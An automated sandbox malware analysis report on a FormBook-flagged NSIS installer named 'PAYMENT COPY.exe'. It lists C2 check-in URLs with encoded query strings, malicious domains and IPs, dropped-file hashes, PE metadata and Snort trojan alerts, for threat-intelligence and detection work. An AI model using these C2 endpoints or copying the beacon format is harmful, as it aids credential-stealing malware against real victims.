Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 2.23.155.186, 2.23.155.232, 52.147.198.201, 104.43.193.48, 52.255.188.83, 20.50.102.62, 92.122.213.247, 92.122.213.194, 104.43.139.144, 52.155.217.156, 20.54.26.129, 184.30.24.56, 168.61.161.212, 20.82.210.154
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com.edgesuite.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

Match | Associated Sample Name / URL | Detection | Context
23.227.38.74
  Payment advice IN18663Q0031139I.xlsx | malicious | www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
  winlog.exe | malicious | www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
  36ne6xnkop.exe | malicious | www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
  Pd0Tb0v0WW.exe | malicious | www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
  giATspz5dw.exe | malicious | www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
  IN18663Q0031139I.xlsx | malicious | www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
  HG546092227865431209.exe | malicious | www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
  Ref. PDF IGAPO17493.exe | malicious | www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
  pumYguna1i.exe | malicious | www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
  0BAdCQQVtP.exe | malicious | www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
  TazxfJHRhq.exe | malicious | www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
  AQJEKNHnWK.exe | malicious | www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
  payment.exe | malicious | www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
  Order.exe | malicious | www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
  PO91361.exe | malicious | www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
  RFQ11_ZIM2021pdf.exe | malicious | www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
  1517679127365.exe | malicious | www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
  W88AZXFGH.exe | malicious | www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
  OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exe | malicious | www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP
  P1 032021.exe | malicious | www.handmadebyaspenhillfarm.com/mdi/?Y4pT-VJH=4epUEO0tHWTXkdIcuRd6Nq0v/RBz/qAjN33S7V6Z6YNQB3lA9BQkHpvYTzVx/n7sMWEr&bl=VTChTb7HLlUx2na

                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
shops.myshopify.com
  Payment advice IN18663Q0031139I.xlsx | malicious | 23.227.38.74
  winlog.exe | malicious | 23.227.38.74
  36ne6xnkop.exe | malicious | 23.227.38.74
  Pd0Tb0v0WW.exe | malicious | 23.227.38.74
  giATspz5dw.exe | malicious | 23.227.38.74
  cV1uaQeOGg.exe | malicious | 23.227.38.74
  CNTR-NO-GLDU7267089.xlsx | malicious | 23.227.38.74
  IN18663Q0031139I.xlsx | malicious | 23.227.38.74
  HG546092227865431209.exe | malicious | 23.227.38.74
  Ref. PDF IGAPO17493.exe | malicious | 23.227.38.74
  pumYguna1i.exe | malicious | 23.227.38.74
  0BAdCQQVtP.exe | malicious | 23.227.38.74
  TazxfJHRhq.exe | malicious | 23.227.38.74
  AQJEKNHnWK.exe | malicious | 23.227.38.74
  New Order.exe | malicious | 23.227.38.74
  payment.exe | malicious | 23.227.38.74
  BL836477488575.exe | malicious | 23.227.38.74
  Order.exe | malicious | 23.227.38.74
  PO.exe | malicious | 23.227.38.74
  PO91361.exe | malicious | 23.227.38.74

                                                                ASN

Match | Associated Sample Name / URL | Detection | Context
NINETRS
  https://nl.raymondbaez.com/xxx/redirect/ | malicious | 104.250.166.31
  https://nl.largecanvasprints.com/sd/just | malicious | 104.250.166.28
CLOUDFLARENETUS
  PO NUMBER 3120386 3120393 SIGNED.exe | malicious | 1.2.3.4
  Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe | malicious | 172.67.222.176
  BL2659618800638119374.xls.exe | malicious | 172.67.222.176
  Purchase order and quote confirmation.exe | malicious | 172.67.222.176
  Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe | malicious | 172.67.188.154
  Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe | malicious | 104.21.17.57
  SOA.exe | malicious | 104.21.19.200
  RFQ No A'4762GHTECHNICAL DETAILS.exe | malicious | 104.21.19.200
  GQ5JvPEI6c.exe | malicious | 104.21.17.57
  setupapp.exe | malicious | 172.67.164.1
  g2qwgG2xbe.exe | malicious | 172.67.161.4
  C++ Dropper.exe | malicious | 104.21.50.92
  12042021493876783,xlsx.exe | malicious | 23.227.38.65
  JSTCG21040600210 xlxs.exe | malicious | 104.21.19.200
  PAYMENT RECEIPT.exe | malicious | 172.67.188.154
  PO5411.exe | malicious | 104.21.21.198
  COMMERCIAL INVOICE N#U00c2#U00ba 0001792E21.exe | malicious | 104.21.17.57
  9479_pdf.exe | malicious | 172.67.222.176
  fyi.exe | malicious | 172.67.188.154
  inv.exe | malicious | 104.21.73.99
OVHFR
  Swift copy.pdf.exe | malicious | 51.222.80.112
  PO-4147074_pdf.exe | malicious | 51.195.53.221
  kQVi54bTM0.exe | malicious | 5.196.102.93
  cym4u.exe | malicious | 188.165.17.91
  Statement-ID-(400603).vbs | malicious | 51.89.204.5
  $108,459.00.html | malicious
                                                                • 146.59.152.166
                                                                LtfVNumoON.exeGet hashmaliciousBrowse
                                                                • 144.217.30.204
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • 142.4.204.181
                                                                SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                • 149.202.83.171
                                                                SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                • 91.121.140.167
                                                                fileshare.docGet hashmaliciousBrowse
                                                                • 188.165.245.148
                                                                SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                • 51.89.77.2
                                                                R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                • 51.38.214.75
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                Quotation_pdf.exeGet hashmaliciousBrowse
                                                                • 51.195.53.221
                                                                0L2qr7kJMh40sxq.exeGet hashmaliciousBrowse
                                                                • 66.70.204.222
                                                                One.exeGet hashmaliciousBrowse
                                                                • 94.23.66.110
                                                                ORDER-02188.exeGet hashmaliciousBrowse
                                                                • 178.33.222.243

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\5r6mhdppdaz
Process: C:\Users\user\Desktop\PAYMENT COPY.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.998981429104046
Encrypted: true
SSDEEP: 3072:I3WMw/3B14lKQpzny0hgpmRZ+iwo0M2RsYnd3eTkNtoWzX9Za7Zk:I3WMw/4lKQpzyG+iwoL+sMduTezXIS
MD5: 62B43B42F92CF148B8EB8A59E73992DE
SHA1: 27464DA3E2727CC0D42A1E6CA5623944EA7D3010
SHA-256: 64A4D031533B659211B8FC9DF85BEADFE13EF2C408D38DA11918DEFE4F349B6E
SHA-512: 911D0FCBA1BC073DC897A5AEA9AEC6EB2D7D5CFA2AB67AA7BCBFBABD702A1D7978A52B0855AB221733E8002EF26D9D3DA43E40ACB99B19F0D5E4AE9FF09616A6
Malicious: false
Reputation: low
Preview: ....\K..]2........&...3:,.{d1j.k......K........Y<.........c...M..~.........s....z.gY..1S.a...~l.?w...X......iG..n..Y.~....N8..l..}....O:...L...F..l...Gw..F.*...._....ca..I..L@CW%..F..5....5..:.6.....x.I..l.....v...<{.a.D.....2............*..!.X.,T%?..n.....m...[.n...=.o..?.....V....q..C........g....H6..p.......j....Q=.....B......c.6...*....d......n.:.@.....M.F<..Jn..........p.....>V.P}..P.x..@.d.lRmj....M.P.....lP..5u'f..I.....!4..f^W.....l......8....,.C.F...6..[.._4.K,..~.W..r..x~S...ye.........F.8.W.[|V.$A..MO....&s..S5.Ei....%..d.R....p.U<].g.(.4.........../.`....G..._!N.*.e.O.*...T..U@d.........B......1.=~>8...\._..F%+"7.$*}fU....q..D..2(..@d..)..9._../. u[BF..kf\N..H.Sm.._&...5K.......Uz.h,....(.U...h.......H.Ay..1.Z.3'5.z....._....4f.J...)...z..K..[....:..({..H..[d.C4 .`T....Pg.(..sg_.......#.W$...FR|V.......{%:..-s.5.....8.:.........b.EK.....0..V..z..CL(...uX{.\\/.Bi.$y&.,..._.....p._.{...IrU.=.....U..D.:0......j..'..s..A%*.~..Z\..2.

C:\Users\user\AppData\Local\Temp\jptmg4zdrr658q2oh
Process: C:\Users\user\Desktop\PAYMENT COPY.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.249328842909832
Encrypted: false
SSDEEP: 192:Jmm1XTomqd+ObD+9d4z6CYkjwVxnaehbfcGPRIm8SMW:MmpomlObD+vxPpcOcSMW
MD5: 5EE12EF6F6DB0B75AB71AF53A97168E5
SHA1: 1285BFEFF889668A0D04CA92ADB13B406C22D06B
SHA-256: 4CE4C5E11A7F609B99BD99B0EB22F315DB167600F181467FAEEEB68FE897728A
SHA-512: 27623F48F2A02E34F207A9961645ED4914C66BED07167D0305DFA29636D157F8F6708DEB359CA35598AFE84755CD8F11698AF052A37320931A3A13E6879EB251
Malicious: false
Reputation: low
Preview: ....a.J.......{....o...}.|.....J..J..r....w..zJ..%....wM....{..ep>..J....>.d.J."...>...J.b..>.c.J.....&..J....&.h.J.)...&..J.s.....u.J........J......p.J.4...&..J.t..&.s.J...........>.d...k>..J.*>.....k>.a.J..>_c...k&..J.-&F..k&.h.J..&gh...k.n.J.,....g.d....p.J.v....s.J.....&I.J....&.h.J.5...&..J.w..>.e.J.....>...J....>.`.J. ...&..J.`..&.c.J.....&..J.......t.J.3......u......c.~...&q..d...r.....&}.q...ws...v.ppp...~r..U...n.|||...~.1.'...n.xxx.....g..}.xy.{.}J.....0hB.....p.....q............|.J.....+.......x.J.....iin.....w3q{{..`e...X...o9}{{..a...~'.....}n.x.xJ..f%.<..e...by:{}}..`...f...K..s...r.!.{{......M...K...J..J.......f...z[..J.|J.}..tq....r.{.....qJx.J.......|JedJ..K.n{J.......Y..J.........Z..n[..{.z..f...g..n...n...|.|....|......y...`Y.x....{....e.......&{&...p..>q>.>p..ke......c..m...s.N......{y....{......c..............Aa..`.{..c..f|.....r..c..l.......8;x...cP..'...J..............r.P.......o...NR=||>.~{..y&......

C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
Process: C:\Users\user\Desktop\PAYMENT COPY.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5632
Entropy (8bit): 4.077323125673351
Encrypted: false
SSDEEP: 48:a97yf72xMWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSmHSnM:1AT4IGN4/GCBKxfQKuixNHSM
MD5: ACFD9B42770B735A036C3DEABC11FFFA
SHA1: FAD50F0007FDCC82F238F882DC2A25F448FC2E97
SHA-256: D6F47850D33B1801E309180394A5557804145DAEA4818B9F17FBEECAFD364EAC
SHA-512: 02AD5BF95A690B0281FCB3E0F3D466C244443AA9AFC1592C74EF7E60B5914830B9630576F516532E0A92C69495CE24F89A937EA61A8CE7BF24642308FE608D34
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L...+.s`...........!......................... ...............................`............@.........................P ..P....1.......@.......................P......0 ...............................................0...............................code............................... ....data...|.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.904570189861365
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PAYMENT COPY.exe
File size: 206697
MD5: 0cdbfdf044cfa1d810ed06b745ac9cd9
SHA1: 124e5c370a103888227112141ea559b85ae17656
SHA256: 8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
SHA512: 69a23fa871044faf8c58f0a67f49b2d74d72b2880eb299144fd3ee854880f40fe50f14503ce0e320af3e661a9722bc7f20a4055a000fdf9b72e1f0aeba9f5793
SSDEEP: 6144:HdiVOo3WMw/4lKQpzyG+iwoL+sMduTezXIi:MVl3Jw/NYzFwQN6mezXIi
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40314a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

Entrypoint Preview

Instruction
sub esp, 0000017Ch
push ebx
push ebp
push esi
xor esi, esi
push edi
mov dword ptr [esp+18h], esi
mov ebp, 00409240h
mov byte ptr [esp+10h], 00000020h
call dword ptr [00407030h]
push esi
call dword ptr [00407270h]
mov dword ptr [007A3030h], eax
push esi
lea eax, dword ptr [esp+30h]
push 00000160h
push eax
push esi
push 0079E540h
call dword ptr [00407158h]
push 00409230h
push 007A2780h
call 00007F3604971EC8h
mov ebx, 007AA400h
push ebx
push 00000400h
call dword ptr [004070B4h]
call 00007F360496F609h
test eax, eax
jne 00007F360496F6C6h
push 000003FBh
push ebx
call dword ptr [004070B0h]
push 00409228h
push ebx
call 00007F3604971EB3h
call 00007F360496F5E9h
test eax, eax
je 00007F360496F7E2h
mov edi, 007A9000h
push edi
call dword ptr [00407140h]
call dword ptr [004070ACh]
push eax
push edi
call 00007F3604971E71h
push 00000000h
call dword ptr [00407108h]
cmp byte ptr [007A9000h], 00000022h
mov dword ptr [007A2F80h], eax
mov eax, edi
jne 00007F360496F6ACh
mov byte ptr [esp+10h], 00000022h
mov eax, 00000001h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/12/21-09:44:45.382473 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.417531 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
04/12/21-09:44:45.418858 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.454300 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 149.11.89.129 | 192.168.2.6
04/12/21-09:44:45.456656 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.492495 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.49.165 | 192.168.2.6
04/12/21-09:44:45.492950 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.533869 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.0.18 | 192.168.2.6
04/12/21-09:44:45.534473 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.581049 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 154.54.36.53 | 192.168.2.6
04/12/21-09:44:45.581555 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.627831 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.15.66 | 192.168.2.6
04/12/21-09:44:45.628741 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.698393 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 195.22.208.117 | 192.168.2.6
04/12/21-09:44:45.698731 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.754598 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 93.186.128.39 | 192.168.2.6
04/12/21-09:44:45.779814 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 2.23.155.186
04/12/21-09:44:45.835206 | ICMP | 408 | ICMP Echo Reply | | | 2.23.155.186 | 192.168.2.6
04/12/21-09:45:38.392312 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49719 | 23.227.38.74 | 192.168.2.6
04/12/21-09:45:43.519484 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49723 | 80 | 192.168.2.6 | 104.21.28.135
04/12/21-09:45:43.519484 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49723 | 80 | 192.168.2.6 | 104.21.28.135
04/12/21-09:45:43.519484 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49723 | 80 | 192.168.2.6 | 104.21.28.135
04/12/21-09:46:27.541057 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 14.129.120.32
04/12/21-09:46:27.541057 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 14.129.120.32
04/12/21-09:46:27.541057 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 14.129.120.32

                                                                TCP Packets


                                                                UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 09:45:38.098738909 CEST | 192.168.2.6 | 8.8.8.8 | 0x18 | Standard query (0) | www.cjaccessories.net | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:43.401276112 CEST | 192.168.2.6 | 8.8.8.8 | 0x601a | Standard query (0) | www.sportfest40.com | A (IP address) | IN (0x0001)
